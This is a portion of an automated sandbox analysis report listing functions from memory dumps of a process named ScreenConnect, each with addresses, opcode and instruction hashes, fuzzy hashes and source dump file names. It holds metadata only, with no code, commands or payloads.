                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 93ff1489030495f4e337707d844e8100301b5306327a5ac5cdef376a2a515bf8
                                                                                                                                                                                                                                                        • Instruction ID: 1c55f0eda8c81ac38b1e34db9f493a441e2fad9034cc4a12e860766be33f23d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93ff1489030495f4e337707d844e8100301b5306327a5ac5cdef376a2a515bf8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54F08C77B0D2085FD728CABEA40069BBBEEDBC4220B14C07FE55DC3741E931A4008764
                                                                                                                                                                                                                                                        Function 0191329C Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2b71777a6e11a73144e691d0254edf4d2d0db0aad2fe2e7ec7296ae685755746
                                                                                                                                                                                                                                                        • Instruction ID: 11ceb345fae852e29af91cc31dd27c16d0402d583840485528f8478be4d4fb38
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b71777a6e11a73144e691d0254edf4d2d0db0aad2fe2e7ec7296ae685755746
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEF0246250C3914FE3139768F8512D92FB1BE832107888ACBD0C2CB557D688AB4BC3A2
                                                                                                                                                                                                                                                        Function 0191F63A Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b4bcc3bd9e26c665a53ab0f31a9a490e3f6e67b66eda49ce41e346655febd10e
                                                                                                                                                                                                                                                        • Instruction ID: b7cead836d13fa56ba15208275cde261f553a4101155b832848a3cc7d43d0f23
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4bcc3bd9e26c665a53ab0f31a9a490e3f6e67b66eda49ce41e346655febd10e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDF0897774020A6FDF059E98D8505EE3B97FBCC350B008429EA09D7350DE719926AB95
                                                                                                                                                                                                                                                        Function 0191FA08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 70a4ee8b51ad5c2141fcc61895a2c53a30d98ab2919b57d032d2a1cf3af0a7cf
                                                                                                                                                                                                                                                        • Instruction ID: 9fb2ccdfcb653ce6985bb58fc90d14e9749174277f959e738ffeeb1f6b0a8259
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70a4ee8b51ad5c2141fcc61895a2c53a30d98ab2919b57d032d2a1cf3af0a7cf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF0E27170030AAB86119A5EE88098BB7CADFC5B60340C42AE10EDB300EF65EC4A4BE1
                                                                                                                                                                                                                                                        Function 040D3FA0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 961decf498ae2781c699f6c53ad23bd3c5dc33f7fae8905001078b0439a24be2
                                                                                                                                                                                                                                                        • Instruction ID: 040f3eb030b7eefedadf4e70daa848ecf76bbff5b2870675b761505d424ad6f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 961decf498ae2781c699f6c53ad23bd3c5dc33f7fae8905001078b0439a24be2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF0BE313003086FA700DA69E880E5EB7E9EF856A07108629E809CB390DAB1EC4587A1
                                                                                                                                                                                                                                                        Function 040D2EB0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a09dab3f82fe2c56d12cecba25c67b99b876f440d9f6c4b4d0e299ea538426f1
                                                                                                                                                                                                                                                        • Instruction ID: 0d753cb42f05c12f594debf7370c88c4683e6ec3d42d7439b7be3b8d9893674b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a09dab3f82fe2c56d12cecba25c67b99b876f440d9f6c4b4d0e299ea538426f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01DCB2959387CFEF12DF24E8417A97FB0EF06310F000EAEC0829A182CB78504A8B41
                                                                                                                                                                                                                                                        Function 040D4FC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 30930a9b74858d7c62a72da48743fdc20d3084c6bac5e410ea29edacd626d30b
                                                                                                                                                                                                                                                        • Instruction ID: b2ad19a7904a314f5e9f270240f9a02663f28f6f0bb72d2ed489a1ce49ca9a13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30930a9b74858d7c62a72da48743fdc20d3084c6bac5e410ea29edacd626d30b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88F05E327043006BA7149B6AE44099FB7EAEFC5654344C56DE50ADB310EE72F90A8B91
                                                                                                                                                                                                                                                        Function 040D3F91 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 12e9194aab34d9b91371729fe645e5b2fea3a95834ec68f71daea863b82a0662
                                                                                                                                                                                                                                                        • Instruction ID: 4caf113595c4d671fb5d5d512ed99b695d24d765554b3352320a94a73aa8e221
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e9194aab34d9b91371729fe645e5b2fea3a95834ec68f71daea863b82a0662
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F090713003049FE714DB68E480A6DB3E6EF846A1B148A35E919DB790EAB1ED458791
                                                                                                                                                                                                                                                        Function 0191E258 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e1e602c24e0e22d887ceab27082335973f9f0c6405ffc875f5baf40633bcf39
                                                                                                                                                                                                                                                        • Instruction ID: f50f65b46481910df07c214c36c13abaeed89c9e0d4c355ad0c16187174b4e6f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e1e602c24e0e22d887ceab27082335973f9f0c6405ffc875f5baf40633bcf39
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85F03771E002449FDB45CF69C840ADDBFF1EF89220B1485A9E419DB261E771AA13CB80
                                                                                                                                                                                                                                                        Function 040D2EC0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 93e5c62be9fa090d35ad98708e4ecf4414da3c2d3f71f809a7dada3961b2c346
                                                                                                                                                                                                                                                        • Instruction ID: 7cf1ea5a291a44311ceacefaad12b1bd07c6ac090ff078e902b13e8e0e094610
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93e5c62be9fa090d35ad98708e4ecf4414da3c2d3f71f809a7dada3961b2c346
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF04970E4030ADBDF44DE64E81476EBBB0EB49315F004CA9D505A7240DFB4655A9B92
                                                                                                                                                                                                                                                        Function 0191AA48 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 643a8d44953bf9b6a3da757834b4a04f525868abf277bea5c86322816382be94
                                                                                                                                                                                                                                                        • Instruction ID: 95a155014ff0fcb6d72f1902379a659a9b49eefc0476b080353039fd22581950
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 643a8d44953bf9b6a3da757834b4a04f525868abf277bea5c86322816382be94
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF020353093804FDB0A6B7DB0981687FEBAB8A25170800BED68ADB395CD284C0AC716
                                                                                                                                                                                                                                                        Function 019131F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b874c596c1e870d63c775b279acbba08b7d1a23876fe732d01d6ba59bf5409ac
                                                                                                                                                                                                                                                        • Instruction ID: 11fcdf3e0649f34ae8969a93f1514f52af6df5190050309e579fa97326ecc837
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b874c596c1e870d63c775b279acbba08b7d1a23876fe732d01d6ba59bf5409ac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F03730A0020CEFDB41EFA8C545A9CBBB0FF04351F5084A8C849BB208DB306F81CB51
                                                                                                                                                                                                                                                        Function 0191BCB9 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: df3e2385d17ba8bf92e16e62a6b01dcffc4e0a9daf5f717ba229918ef47e34a1
                                                                                                                                                                                                                                                        • Instruction ID: b231f4edb5a0b96bb9db8b24cbaf39afa5ef47f171389a2a187d665accfe9e9b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df3e2385d17ba8bf92e16e62a6b01dcffc4e0a9daf5f717ba229918ef47e34a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F0E572A0D3905EE71B8BBD541059B7FEE8F86224B29C4FFD08DC3242E8349401C761
                                                                                                                                                                                                                                                        Function 0191E2A2 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4da74b2cf6b2fb7388c437d618ea417f1c863bc343915b05506a2f11575787aa
                                                                                                                                                                                                                                                        • Instruction ID: a99a14b075dab9c884c4115c49d517bb0314b5126da377ae32a57f6fb31f7e33
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4da74b2cf6b2fb7388c437d618ea417f1c863bc343915b05506a2f11575787aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1F06730B006088FEB19CF68C414BAAB7E1EF88600B04C065ED09DB358DB74DE41CB80
                                                                                                                                                                                                                                                        Function 0191EBA0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d0599d6ebd533fd9736ccad5d77c84b6dd8b6e11b91ffcba943410e1f469311
                                                                                                                                                                                                                                                        • Instruction ID: a02e6ae649de5af6bba50730b3d24bae4bf59d6acbd6317681637f589995934a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d0599d6ebd533fd9736ccad5d77c84b6dd8b6e11b91ffcba943410e1f469311
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E06575B0420CAF5B05CA4ED400D5BBBEEEFC8220714C02AFC0DC7305D975D9518BA0
                                                                                                                                                                                                                                                        Function 040D5320 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d35c6e512b830484f9435dddcc020db601c43947c3d648d37a16a7aaf8b07bc5
                                                                                                                                                                                                                                                        • Instruction ID: 6268ad31b926e41656ce21d003b13bff019ccb13ece4f8db91028f30ceb99389
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d35c6e512b830484f9435dddcc020db601c43947c3d648d37a16a7aaf8b07bc5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF0A0B63003008FD3089B18E144B967BE2FF88715B5680A9D589CB3B1DA70ED42CB40
                                                                                                                                                                                                                                                        Function 019131E0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3dd62607a199eb93904416edab8de303fe6a3023c8bbb38dd79362c521817390
                                                                                                                                                                                                                                                        • Instruction ID: 6e663a2caa404ace2377e037f9e87b5117fbe9dbd6519b3e0f224485264b5039
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dd62607a199eb93904416edab8de303fe6a3023c8bbb38dd79362c521817390
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0A930908288DBCB02EBA8D5815DC7FB1EF02260F5049D9C495AB196CB342B82CB82
                                                                                                                                                                                                                                                        Function 01914EE8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1518dc9f0ddcd5f74a10ee402060d567a7864434d350ec87351be35599a85155
                                                                                                                                                                                                                                                        • Instruction ID: 62bdd4bd1791666fad9ef6a8ae1b060522713ed05271f60270842526c3475aef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1518dc9f0ddcd5f74a10ee402060d567a7864434d350ec87351be35599a85155
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BE02BB29083043FC7059BADA4105DD7FF8EF8A310B15009BD40CD7342E93156468396
                                                                                                                                                                                                                                                        Function 0191E268 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2608d5fba781e5fbaf621aef7f48731e294c23f997acab75e2d6ff4fd06c1163
                                                                                                                                                                                                                                                        • Instruction ID: ed38a1b05f9a325c337012ff045104865e563fc5bbe838c3fdd489a2d69ef75b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2608d5fba781e5fbaf621aef7f48731e294c23f997acab75e2d6ff4fd06c1163
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0B271E002199F8B40DFADC840AEEFBF4EF49200B20846AD918E7210E331AA52CB80
                                                                                                                                                                                                                                                        Function 0191AA58 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8be526104f5703dafcf2cce64853d44fb9ac5902ef0e5a163a607a2fbd30e792
                                                                                                                                                                                                                                                        • Instruction ID: ac83e62f8b31996124fc8378051d38f8320570fcaa497a2302c55fc69d453f8e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8be526104f5703dafcf2cce64853d44fb9ac5902ef0e5a163a607a2fbd30e792
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE026323003145B9B142EAFB48C56EBBDFEBC8A61754443DEA0ED7340CE799C0A47A4
                                                                                                                                                                                                                                                        Function 01910E30 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 828aec18fe024edbc8e812654aedc0d84fe23ca7d44143a7d00b9c53a2670f27
                                                                                                                                                                                                                                                        • Instruction ID: eb7c0a84459dab296b0230cee1f80f3363645b8b43cf73e755a656827648d615
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 828aec18fe024edbc8e812654aedc0d84fe23ca7d44143a7d00b9c53a2670f27
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E0D8326043005B83006769A40549F77A6FEC2B51740C47EE60BCB344DEB2EE4A8FE2
                                                                                                                                                                                                                                                        Function 01915920 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 41a925e7c487a6406e36a7000f8debcc4295892d3f92fc847de47d38eef7d68b
                                                                                                                                                                                                                                                        • Instruction ID: 5b4056ee8073dfc97c7e45a2ab2a8fd83cf3badef0aabab31a1d859c0f3ab113
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41a925e7c487a6406e36a7000f8debcc4295892d3f92fc847de47d38eef7d68b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE0E5363052004BC3056F78F95409C3F56EBD5262324417ED545E33CACE289D16C341
                                                                                                                                                                                                                                                        Function 0191F950 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9e3e3e23fecace6cdfefcec342ba0fa27904a0480c8966a871f784bbafec6478
                                                                                                                                                                                                                                                        • Instruction ID: 6aafaab7a6daaad7a78b59e96308494b7246ee53ddfdad9808342b3465f34212
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e3e3e23fecace6cdfefcec342ba0fa27904a0480c8966a871f784bbafec6478
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05E02632B012051BC314A51EE890957B3AAEFCA720F100879D50CC7305CE72DC438290
                                                                                                                                                                                                                                                        Function 040D5330 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fb9f7acebe1f9554593637605c1c56306f8b74d13bb4b47901391951ca14ee5b
                                                                                                                                                                                                                                                        • Instruction ID: 0e37ee7cf36c2a831756ccf41c78025cfb1299596c15fea1cfa222bc0241c737
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb9f7acebe1f9554593637605c1c56306f8b74d13bb4b47901391951ca14ee5b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CE09A313003009FD3189B1AC544E16BBEAEFC9B24B5984ADE9499B3B1CBB1FC41CB80
                                                                                                                                                                                                                                                        Function 01913257 Relevance: .0, Instructions: 23COMMON
